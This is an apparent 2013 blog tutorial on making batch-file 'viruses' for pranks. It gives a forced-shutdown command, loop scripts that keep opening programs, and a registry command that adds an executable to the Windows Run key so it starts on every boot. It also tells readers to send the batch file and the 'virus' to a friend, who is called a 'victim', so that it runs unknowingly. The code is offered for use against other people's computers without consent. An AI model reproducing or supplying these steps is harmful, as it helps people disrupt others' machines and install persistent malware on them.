Tuesday 3 December 2013

Execute virus [or any file] on startup...

Here's a way of playing pranks on your friends computer by executing a particular file everytime the PC starts.
It is very easy to do it manually, but, we should have physical access to the victim computer for that.
In this post, I'm gonna show you how to do it with the help of a batch file.

Creating the virus:

You should be familiar with the simple batch file programs/viruses, such as, if you wanna shutdown the PC, you simply open notepad and type:

@echo off
shutdown -s -t <time> -c <comment>    ['-s' is for shutdown '-r' is restart etc]

Or if you wanna continuously open a file like notepad or firefox, you type in:

For Firefox For Notepad
@echo off
goto a


@echo off

start notepad.exe
goto a

These are some of the simplest and basic virus which you can make on notepad.
You can make any of use any kind of virus you want.

Executing on startup:

It is very easy to do it manually but we are gonna do it with the help of a batch file.
Just follow these steps given below:

1. Open a Notepad file

2. Write down the following command in RED

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v demo /t REG_SZ /d demo.exe 
[where demo.exe is your virus]

3.Now save the notepad file with any name say "Startup" but extension should be ".bat". Means we will have to create a batch file eg: Startup.bat

4. Now send Startup.bat along with demo.exe virus to your friend. Whenever he will click on Startup.bat file automatically demo.exe will reach at the start up.

Now the Virus will be executed after the PC is restarted.

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